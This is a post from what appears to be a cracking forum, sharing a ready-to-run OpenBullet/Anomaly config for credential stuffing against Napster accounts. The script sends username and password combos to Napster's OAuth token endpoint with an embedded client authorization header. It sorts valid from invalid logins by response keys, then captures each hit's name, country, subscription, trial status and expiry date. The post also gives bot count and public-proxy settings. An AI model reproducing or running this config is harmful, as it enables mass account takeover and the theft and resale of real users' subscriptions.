• We just launched and are currently in beta. Join us as we build and grow the community.

Napster API Config Works With Public Proxies .anom

luciakfer

Dynamic Testing Ninja
L Rep
0
0
0
Rep
0
L Vouches
0
0
0
Vouches
0
Posts
156
Likes
130
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
bots:200
Proxy: Public HTTPS
Capture: Yes
view the code :
[SETTINGS]
{
"Name": "Napster.com",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2021-02-12T21:11:28.190256+00:00",
"AdditionalInfo": "",
"Author": "",
"Version": "1.4.4 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"Crop": false,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
#US FUNCTION URLEncode "<USER>" -> VAR "US"
#PS FUNCTION URLEncode "<PASS>" -> VAR "PS"
#Login REQUEST POST "https://api-web.napster.com/oauth/token"
CONTENT "username=<US>&password=<PS>&grant_type=password"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Accept: application/json, text/javascript, */*; q=0.01"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Accept-Language: en-US,en;q=0.9"
HEADER "Authorization: Basic WkRVMU1ETXpNekl0WlRNd055MDBZVGhpTFRobFltUXRaV1V3TmpCaVpUSmpORFptOk4yRTJaR1U0WWpJdE56STJNaTAwWVRoaUxXSTRPRFl0WW1FeU5EQXhaamt3TWpZdw=="
HEADER "Connection: keep-alive"
HEADER "Content-Length: 64"
HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8"
HEADER "Host: api-web.napster.com"
HEADER "Origin: https://app.napster.com"
HEADER "Referer: https://app.napster.com/"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Site: same-site"
HEADER "Sec-GPC: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Safari/537.36"
KEYCHECK
KEYCHAIN Failure OR
KEY "{\"code\":\"UnknownCredentials"
KEY "message\":\"No user found"
KEY "{\"code\":\"ForbiddenError"
KEY "message\":\"Invalid password.\"}"
KEY "{\"code\":\"BadRequestError"
KEYCHAIN Success OR
KEY "access_token"
#token PARSE "<SOURCE>" JSON "access_token" -> VAR "token"
#First_Name PARSE "<SOURCE>" JSON "first_name" CreateEmpty=FALSE -> CAP "First_Name"
#Last_Name PARSE "<SOURCE>" JSON "last_name" CreateEmpty=FALSE -> CAP "Last_Name"
#Account REQUEST GET "https://api.napster.com/v2.2/me/account?"
HEADER "Accept: application/json, text/javascript, /; q=0.01"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Accept-Language: en-US,en;q=0.9"
HEADER "Authorization: Bearer <token>"
HEADER "Connection: keep-alive"
HEADER "Content-Type: application/json"
HEADER "Host: api.napster.com"
HEADER "Origin: https://app.napster.com"
HEADER "Referer: https://app.napster.com/"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Site: same-site"
HEADER "Sec-GPC: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Safari/537.36"
#Country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country"
#Current_Subscription PARSE "<SOURCE>" JSON "isCurrentSubscriptionPayable" CreateEmpty=FALSE -> CAP "Current_Subscription"
#Screen_Name PARSE "<SOURCE>" JSON "screenNameAutoCreated" CreateEmpty=FALSE -> CAP "Screen_Name"
#Subscription PARSE "<SOURCE>" JSON "productName" CreateEmpty=FALSE -> CAP "Subscription"
#Is_Trial PARSE "<SOURCE>" JSON "isTrial" CreateEmpty=FALSE -> CAP "Is_Trial"
#Expiration_Date PARSE "<SOURCE>" LR "expirationDate\":\"" ":" CreateEmpty=FALSE -> CAP "Expiration_Date"
#Trial_Length_Days PARSE "<SOURCE>" JSON "trialLengthDays" CreateEmpty=FALSE -> CAP "Trial_Length_Days"
#Status PARSE "<SOURCE>" LR "state\":\"" "\"" CreateEmpty=FALSE -> CAP "Status"
FUNCTION Constant "" -> CAP "Config By"
 

437,153

314,794

314,803

Top